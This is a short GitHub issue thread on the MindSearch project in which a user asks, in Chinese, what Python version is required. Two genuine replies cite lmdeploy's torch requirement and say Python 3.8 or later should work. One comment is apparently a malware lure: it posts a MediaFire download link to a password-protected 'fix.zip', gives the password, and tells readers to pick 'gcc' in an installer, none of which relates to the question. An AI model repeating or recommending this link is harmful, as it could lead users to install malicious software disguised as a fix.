### ISSUE TITLE
需要的python版本号是多少

### ISSUE THREAD

**Issue by Lambert6** [InternLM/MindSearch#179]

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mengrennwpu** [comment]
@Lambert6 底层用的Lmdeploy框架，可以看看里面的torch要求，"torch<=2.3.1,>=2.0.0"

**Comment by Harold-lkk** [comment]
Python3.8 及以上应该都可以跑起来
